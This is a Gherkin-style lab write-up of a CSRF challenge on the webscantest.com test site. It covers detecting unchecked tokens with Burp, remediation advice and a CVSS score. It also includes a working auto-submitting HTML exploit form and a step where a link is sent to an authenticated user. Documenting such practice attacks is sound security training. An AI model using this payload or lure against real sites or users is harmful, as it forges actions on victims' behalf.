## Version 1.4.1
## language: en

Feature: Cross Site Request Forgery (CSRF)
  TOE:
    web-scanner-test-site
  Category:
    Request Origin Validation
  Location:
    http://www.webscantest.com/
  CWE:
    CWE-352: Cross-Site Request Forgery
  Rule:
    REQ.174 Transactions without distinguishable pattern
  Goal:
    Perform a CSRF attack
  Recommendation:
    Check tokens to validate the origin of the request

  Background:
  Hacker's software:
    | <Software name>      | <Version> |
    | Kali Linux           | 5.4.0     |
    | Firefox              | 68.6.0esr |
    | Burp Suite CE        | v2020-1   |
    | Python               | 2.7.18rc1 |
  TOE information:
    Given that I access the site at
    """
    http://www.webscantest.com/
    """
    Then I see an index of different hacking challenges

  Scenario: Normal use case
    Given that I choose a CSRF challenge under the URL
    """
    http://www.webscantest.com/csrf/token.php
    """
    Then I see a form that asks for input
    When I submit the form with the input "test"
    Then I get the message
    """
    You entered test Token is 73802f54309a48efcd5f9eae3230e3b2
    """

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the functionality previous described
    When I use "Burp" to analyze the request
    Then I notice the parameters sent by the form
    """
    property=test2&csrf_token=0d728c9147eb68145b6e2adbfb4a59d3
    """
    And I try to tamper the CSRF token
    When I change the value of the CSRF token for the word "hacked"
    Then I get the message
    """
    You entered test2 Token is hacked
    """
    And I realize that the server does not validate the token
    And I could perform a CSRF attack

  Scenario: Exploitation
    Given that the server does not validate the token to post a form
    Then I decide to build a simple HTML that autosubmits the form
    """
    <html>
      <head></head>
      <body onload="document.csrfform.submit()">
        <form name='csrfform' method='post'
         action='http://www.webscantest.com/csrf/token.php'>
          <input type='hidden' name='property' value='hacked'>
          <input type='hidden' name='csrf_token' value='hacked'>
          <input type='submit' value='Send'>
        </form>
      </body>
    </html>
    """
    And I use Python to create a HTTP server and serve the file
    And I send a link to the server to an authenticated user from the site
    When they click on the link
    Then the form submits successfully [evidence.png]
    And I managed to forge requests on their behalf

  Scenario: Remediation
  Use the CSRF token value to validate the origin of the request
    Given the CSRF token is randomly generated in every transaction
    And its value is checked to validate the origin of the request
    Given that I do not know the value of the CSRF token
    Then I cannot submit requests on behalf on the user

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.3/10 (Medium) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.1/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    4.8/10 (Medium) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-20
